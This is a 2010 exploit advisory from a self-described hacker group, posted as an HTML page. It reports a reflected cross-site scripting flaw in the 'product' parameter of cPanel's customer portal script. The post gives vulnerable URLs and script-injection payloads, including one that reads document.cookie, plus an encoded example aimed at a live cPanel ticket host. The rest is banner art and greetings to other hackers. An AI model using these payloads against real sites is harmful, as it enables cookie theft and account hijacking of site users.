cPanel Customer Portal (index.cgi) Xss Vulnerability
Posted on 01 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>cPanel Customer Portal (index.cgi) Xss Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== cPanel Customer Portal (index.cgi) Xss Vulnerability ==================================================== /******************************************************************************************/ /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* Sn!pEr.S!Te Hacker /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## 1 ########################################## 1 0 I'm Sn!pEr.S!Te Hacker member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # ------------------------------------------------------------ # Xss Vulnerability (index.cgi) # ----------------------------------------------------------- # cPanel Customer Portal -------------------------------------------------------------- # [+] Author : Sn!pEr.S!Te Hacker # [+] Email : Sniper-site@HoTmaiL.Com # [+] Inj3ct0r Team Hacker # # [+] 1-9-2010 # [+] Version: 2007-2008 # [+] Download:http://www.cpanel.net/ --------------------------------------------------------------- -=[ exploit ]=- http://localhost.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ] http://127.0.0.1.cpanel.net/submit/index.cgi?step=&reqtype=sales&product= [ XSS ] "><script>alert("Sn!pEr.S!Te")</script> "><script>alert(document.cookie)</script> ---------------------------------------------------------------------- -=[ Example ]=- https://tickets.cpanel.net/submit/index.cgi?step=&reqtype=sales&product=%22%3E%3Cscript%3Ealert(%22Sn!pEr.S!Te%22)%3C/script%3E -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ================== Greetz ================================================== SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ===========================all my friend =================================== * PrX Hacker * H-ex * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi | * Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>